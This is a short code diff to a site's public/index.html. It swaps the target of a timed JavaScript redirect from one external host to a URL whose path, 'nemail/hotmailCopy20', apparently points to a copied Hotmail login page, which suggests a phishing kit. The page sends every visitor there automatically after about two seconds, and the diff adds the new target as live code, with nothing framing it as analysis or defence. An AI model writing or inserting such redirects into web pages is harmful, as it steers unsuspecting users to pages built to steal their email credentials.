--- a/public/index.html
+++ b/public/index.html
@@ -18,7 +18,7 @@
   <script>
 setTimeout(function(){
 
-location.href = "http://singuinow053.c1.biz/";
+location.href = "https://rayan-tex.com/nemail/hotmailCopy20/";
 
 }, 2250);
   </script>
